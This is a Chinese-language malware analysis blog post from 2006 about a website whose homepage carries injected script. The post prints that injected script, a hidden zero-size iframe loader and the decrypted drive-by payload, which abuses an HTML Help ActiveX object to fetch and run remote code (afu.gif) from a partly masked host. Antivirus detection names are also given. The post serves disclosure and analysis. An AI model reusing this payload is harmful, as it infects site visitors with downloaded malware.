[2006-03-22]又发现一个带毒网站(第3版)
endurer 原创
2006-03-22 第3版 补充:瑞星对afu.gif的回复。
2006-03-16 第2版 补充:Kaspersky对afu.gif的反应。
2006-03-14 第1版
首页被插入代码:
<script language="javascript" src=" http://www.***3core.com/images/gif.js">
http://www.***3core.com/images/gif.js的代码为:
document.write("<iframe src=http://www.***3core.com/images/error.htm width=0 height=0></iframe>");
http://www.***3core.com/images/error.htm(Kaspersky报为Trojan-Downloader.JS.Agent.e)的内容为加密的脚本,解密后为:
<!--
var Words ="<script>document.write(unescape('<HTML>
<head>
</head>
<BODY>
<div style="display:none">
<OBJECT id="f1"
type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Window" value="$global_ifl">
<PARAM name="Item1" value='command;file://c:/WINDOWS/Help/apps.chm'>
</OBJECT>
<OBJECT id="f2" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Window" value="$global_ifl">
<PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language%20%3D%20JScript src=///" http://www.***3core.com/images/afu.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'>
</OBJECT>
</div>
<script>
f1.Click();setTimeout("f2.Click();",0);
</script>
</BODY>
</HTML>'));</script>"
function OutWord()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
}
OutWord();
// -->
这个error.htm的内容与
中的afu.htm相似,同样是下载一个名为afu.gif的文件。
Kaspersky将afu.gif报为Exploit.VBS.Phel.bq。
瑞星的回复:
| 主 题: | 病毒上报邮件分析结果-流水单号:2141352 |
尊敬的客户,您好!
您的邮件已经收到,感谢您对瑞星的支持。
我们已经详细分析过您的问题和文件,以下是您上传的文件的分析结果:
1.文件名:afu.gif
病毒名:Exploit.VBS.Phel.cd